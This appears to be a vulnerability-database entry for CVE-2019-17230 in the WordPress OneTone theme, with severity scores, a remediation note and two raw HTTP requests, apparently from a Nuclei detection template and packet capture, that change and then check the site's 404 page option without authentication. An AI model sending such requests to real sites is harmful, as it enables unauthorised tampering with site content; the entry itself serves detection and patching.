| Title | WordPress OneTone theme <= 3.0.6 – Unauthenticated Options Changes |
|---|---|
| Author | daffainfo |
| Severity | Medium |
| Impact | Unauthenticated attackers can modify WordPress theme options, potentially changing site content like 404 page messages to inject malicious content or alter site behavior. |
| Remediation | Update the OneTone theme to version 3.0.7 or later, or switch to a different theme. |
| CVSS Score | 5.3 |
| EPSS Score | 0.0849 |
| CVE ID | CVE-2019-17230 |
| Tags | cve cve2019 wordpress wp-theme wp onetone vkev vuln |
includes/theme-functions.php in the OneTone theme through 3.0.6 for WordPress allows unauthenticated options changes.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Connection: close
Content-Length: 64
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
action=onetone_options_import&options={"content_404":"n3YhnTef"}
GET /38FXZ3hY0H2IrxGeIr3qYke2QII HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-17230.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-17230.pcap
N/AN/A